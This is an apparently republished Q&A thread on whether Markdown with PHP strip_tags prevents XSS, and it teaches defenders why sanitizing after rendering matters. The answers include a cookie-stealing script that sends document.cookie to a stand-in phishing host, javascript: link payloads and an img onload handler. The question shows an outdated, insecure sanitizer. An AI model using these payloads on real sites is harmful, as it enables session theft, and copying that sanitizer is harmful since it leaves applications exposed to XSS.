Is Markdown (with strip_tags) sufficient to stop XSS attacks?

Posted on 2024-07-30 06:15:25

I'm working on a web application that allows users to type short descriptions of items in a catalog. I'm allowing Markdown in my textareas so users can do some HTML formatting.

My text sanitization function strips all tags from any inputted text before inserting it in the database:

public function sanitizeText($string, $allowedTags = "") {
    $string = strip_tags($string, $allowedTags);

    if(get_magic_quotes_gpc()) {
        return mysql_real_escape_string(stripslashes($string));
    } else {
        return mysql_real_escape_string($string);
    }
}

Essentially, all I'm storing in the database is Markdown; no other HTML, not even "basic HTML" (like here at SO), is allowed.

Will allowing Markdown present any security threats? Can Markdown be XSSed, even though it has no tags?

Comments (7)

忆伤 2024-08-06 06:15:25

Here's a lovely example of why you need to sanitize the HTML after rendering the Markdown, not before:

Markdown code:

>  <script type="text/javascript"
>  language="js">i=new Image\(\); i.src='http://phishingwebsite.example.com/?l='
> + escape\(window.location\) + '&c=' + escape\(document.cookie\);
> </script>
>

Rendered as:

<blockquote> 
<p><script type="text/javascript"
 language="js">i=new Image(); i.src='http://phishingwebsite.example.com/?l='
+ escape(window.location) + '&c=' + escape(document.cookie);
</script></p> 
</blockquote> 

Now are you worried?

残疾 2024-08-06 06:15:25

I think stripping every HTML tag from the input will get you something pretty secure, unless someone finds a way to inject some really messed-up data into Markdown and have it generate even more messed-up output ^^

Still, here are two things that come to mind:

First: strip_tags is not a miracle function; it has some flaws...

For instance, it will strip everything after the '<' in a situation like this one:

$str = "10 apples is <than 12 apples";
var_dump(strip_tags($str));

The output I get is:

string '10 apples is ' (length=13)

Which is not that nice for your users :-(
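To make the truncation concrete, here is a minimal sketch that runs strip_tags and htmlspecialchars on the same string. The escaping call is only a contrast added for this example (it keeps the user's text intact when it is printed as HTML); it is not something the answer prescribes, and it does nothing about the javascript: links raised in the other answers.

```php
<?php
$str = "10 apples is <than 12 apples";

// strip_tags() treats "<than 12 apples" as the start of an unterminated tag
// and drops everything from the '<' onward.
$stripped = strip_tags($str);

// htmlspecialchars() keeps the text and encodes the characters HTML cares about.
$escaped = htmlspecialchars($str, ENT_QUOTES, 'UTF-8');

var_dump($stripped);
var_dump($escaped);
```

The stripped version loses part of the sentence, while the escaped version still shows the reader the whole sentence once a browser decodes the entity.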

Second: one day or another, you might want to allow some HTML tags/attributes; or, even today, you might want to be sure that Markdown doesn't generate certain HTML tags/attributes.

You might be interested in something like HTMLPurifier: it lets you specify which tags and attributes should be kept, and filters a string so that only those remain.

It also generates valid HTML code, which is always nice ;-)

红颜悴 2024-08-06 06:15:25

Sanitizing the resulting HTML after rendering the Markdown is going to be safest. If you don't, I think people would be able to execute arbitrary JavaScript in Markdown like so:

[Click me](javascript:alert\('Gotcha!'\);)

PHP Markdown converts this to:

<p><a href="javascript:alert('Gotcha!');">Click me</a></p>

Which does the job... and don't even think about adding code of your own to take care of these cases. Correct sanitization isn't easy; just use a good tool and apply it after you render your Markdown into HTML.
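A short sketch of why the question's strip_tags step does not help here: the payload contains nothing that looks like a tag, so it comes out of strip_tags unchanged and reaches the Markdown renderer intact. The variable names are illustrative only, and the backslash escapes from the sample above are left out for brevity.

```php
<?php
// The Markdown link payload from this answer.
$markdown = "[Click me](javascript:alert('Gotcha!');)";

// strip_tags() only removes things that look like tags; there are none here.
$stripped = strip_tags($markdown);

// Prints bool(true): the payload passed through untouched.
var_dump($stripped === $markdown);
```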

贪了杯 2024-08-06 06:15:25

No. The way you are using Markdown is not secure. Markdown can be used securely, but you have to use it right. For details on how to use it safely, look here; the short version is: use the latest version, set safe_mode, and set enable_attributes=False.

The link also explains why escaping the input and then calling Markdown (as you are doing) is not sufficient to be secure. Short example: "[clickme](javascript:alert%28%22xss%22%29)".

献世佛 2024-08-06 06:15:25

"Will allowing markdown present any security threats? Can markdown be XSSed, even though it has no tags?"

It's almost impossible to make absolute statements in that regard: who can say what the Markdown parser can be tricked into with sufficiently malformed input?

However, the risk is probably very low, since it is a relatively simple syntax. The most obvious angle of attack would be javascript: URLs in links or images. The parser probably doesn't allow them, but it's something I'd check out.
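One way to run that check, sketched under assumptions: parse the HTML that the Markdown renderer produced and list every link or image URL whose scheme is not on an allow-list. The function name findSuspiciousUrls and the allow-list are hypothetical, and the example assumes PHP's DOM extension is available. It is an audit aid for testing a renderer, not a substitute for a maintained sanitizer.

```php
<?php
// Hypothetical helper: return href/src values whose URL scheme is not allow-listed.
function findSuspiciousUrls(string $html, array $allowedSchemes = ['http', 'https', 'mailto']): array
{
    // Collect parser warnings instead of printing them for imperfect markup.
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    // Wrap the fragment so the parser always receives non-empty, rooted input.
    $doc->loadHTML('<div>' . $html . '</div>');
    libxml_clear_errors();

    $suspicious = [];
    foreach ([['a', 'href'], ['img', 'src']] as [$tag, $attr]) {
        foreach ($doc->getElementsByTagName($tag) as $node) {
            // getAttribute() returns the entity-decoded value.
            $url = $node->getAttribute($attr);
            // Drop whitespace and control characters before looking at the scheme.
            $normalized = preg_replace('/[\x00-\x20]+/', '', $url);
            if (preg_match('/^([a-z][a-z0-9+.\-]*):/i', $normalized, $m)
                && !in_array(strtolower($m[1]), $allowedSchemes, true)) {
                $suspicious[] = $url;
            }
        }
    }
    return $suspicious;
}

// Feed it HTML of the kind a Markdown renderer might emit for a link.
print_r(findSuspiciousUrls('<p><a href="javascript:alert(1)">Click me</a></p>'));
```

Relative URLs have no scheme and are not flagged; whether that is acceptable depends on the application.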

绳情 2024-08-06 06:15:25

I agree with Pascal MARTIN that HTML Sanitization is a better approach. If you want to do it entirely in JavaScript I suggest taking a look at google-caja's sanitization library (source code).

Smile简单爱 2024-08-06 06:15:25

BBcode provides more safety because you are generating the tags.

<img src="" onload="javascript:alert('haha');"/>

If <img> is allowed, this will go straight through strip_tags ;) Bam!
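A minimal sketch of that case, assuming the allow-list passed to strip_tags contains <img>: the function filters by tag name only and leaves the attributes of allowed tags alone, so the event handler survives.

```php
<?php
// Payload from this answer, with <img> on the allow-list.
$input = '<img src="" onload="javascript:alert(\'haha\');"/>';

$result = strip_tags($input, '<img>');

// Prints bool(true): the tag is kept together with its onload attribute.
var_dump(strpos($result, 'onload=') !== false);
```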
